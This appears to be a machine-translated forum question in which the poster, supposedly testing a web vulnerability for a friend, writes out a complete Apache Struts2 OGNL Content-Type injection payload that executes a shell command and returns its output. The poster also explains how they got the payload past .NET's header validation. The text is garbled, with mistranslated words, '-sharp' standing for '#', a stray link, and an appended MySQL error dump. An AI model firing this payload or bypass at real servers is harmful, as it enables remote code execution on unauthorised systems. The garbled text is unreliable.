Failed to populate Content-type with special characters for HTTP GET.

Hello, bosses!

at the request of a friend, help him test a web vulnerability.
after writing and running a HTTP GET, which he thought was very simple, he found that he could not achieve the desired effect in any case

HttpWebRequest
 
url =xxx,
   method =get,
   content-type="%{(-sharp_="multipart/form-data").(-sharpdm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(-sharp_memberAccess?(-sharp_memberAccess=-sharpdm):((-sharpcontainer=-sharpcontext["com.opensymphony.xwork2.ActionContext.container"]).(-sharpognlUtil=-sharpcontainer.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(-sharpognlUtil.getExcludedPackageNames().clear()).(-sharpognlUtil.getExcludedClasses().clear()).(-sharpcontext.setMemberAccess(-sharpdm)))).(-sharpcmd="whoami").(-sharpiswin=(@java.lang.System@getProperty("os.name").toLowerCase().contains("win"))).(-sharpcmds=(-sharpiswin?{"cmd.exe","/c",-sharpcmd}:{"/bin/bash","-c",-sharpcmd})).(-sharpp=new  (here is new line) java.lang.ProcessBuilder(-sharpcmds)).(-sharpp.redirectErrorStream(true)).(-sharpprocess=-sharpp.start()).(-sharpros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(-sharpprocess.getInputStream(),-sharpros)).(-sharpros.flush())}",
  KeepAlive =false,
  OverTime = 8000 (ms)

after running, I found that the CRLF, problem when assigning a value to header.content-type comes from the spaces and line breaks in the string "P=new Java".
check the stack and officially see that there is a restriction from metadata that there are no spaces or line breaks in the string: https://referencesource.micro.

.
 internal static string CheckBadChars(string name, bool isHeaderValue) {
  
            if (name == null || name.Length == 0) {
                // emtpy name is invlaid
                if (!isHeaderValue) {
                    throw name == null ? new ArgumentNullException("name") :
                        new ArgumentException(SR.GetString(SR.net_emptystringcall, "name"), "name");
                }
                //empty value is OK
                return string.Empty;
            }
  
            if (isHeaderValue) {
                // VALUE check
                //Trim spaces from both ends
                name = name.Trim(HttpTrimCharacters);
  
                //First, check for correctly formed multi-line value
                //Second, check for absenece of CTL characters
                int crlf = 0;
                for(int i = 0; i < name.Length; PPi) {
                    char c = (char) (0x000000ff & (uint) name[i]);
                    switch (crlf)
                    {
                        case 0:
                            if (c == "\r")
                            {
                                crlf = 1;
                            }
                            else if (c == "\n")
                            {
                                // Technically this is bad HTTP.  But it would be a breaking change to throw here.
                                // Is there an exploit?
                                crlf = 2;
                            }
                            else if (c == 127 || (c < " " && c != "\t"))
                            {
                                throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidControlChars), "value");
                            }
                            break;
  
                        case 1:
                            if (c == "\n")
                            {
                                crlf = 2;
                                break;
                            }
                            throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidCRLFChars), "value");
  
                        case 2:
                            if (c == " " || c == "\t")
                            {
                                crlf = 0;
                                break;
                            }
                            throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidCRLFChars), "value");
                    }
                }
                if (crlf != 0)
                {
                    throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidCRLFChars), "value");
                }
            }
            else {
                // NAME check
                //First, check for absence of separators and spaces
                if (name.IndexOfAny(ValidationHelper.InvalidParamChars) != -1) {
                    throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidHeaderChars), "name");
                }
  
                //Second, check for non CTL ASCII-7 characters (32-126)
                if (ContainsNonAsciiChars(name)) {
                    throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidNonAsciiChars), "name");
                }
            }
            return name;
        }

ask for help from all the bigwigs, because friends have achieved the same GETMurmuri with Python and java!
try the following methods
rn error CRLF
string concatenation does not take effect
u0008 error CRLF
\ n does not take effect

Please do me a favor and give me some suggestions or suggestions. Thank you very much.


can you not sink?!

= 04-16 =

the problem has been solved.

from the metadata, it should be able to retrieve rn, but I don't know why I have no problem using concatenated characters.
is as follows:
[code=csharp] payload + = "(- sharpp=new java.lang.ProcessBuilder (- sharpcmds))."); [/ code]

the space does not report wrong at all here, which is strange -!

then encountered the second problem, plus the content-type will still report that the data could not be read from the link, and the link has been closed.

I still read it from the metadata for a long time, but it was useless. I changed the version of HTTP to 10 and solved it perfectly.


suggest taking a look at https://enable-cors.org/

MySQL Query : SELECT * FROM `codeshelper`.`v9_news` WHERE status=99 AND catid='6' ORDER BY rand() LIMIT 5
MySQL Error : Disk full (/tmp/#sql-temptable-64f5-1b30325-2aa3b.MAI); waiting for someone to free some space... (errno: 28 "No space left on device")
MySQL Errno : 1021
Message : Disk full (/tmp/#sql-temptable-64f5-1b30325-2aa3b.MAI); waiting for someone to free some space... (errno: 28 "No space left on device")
Need Help?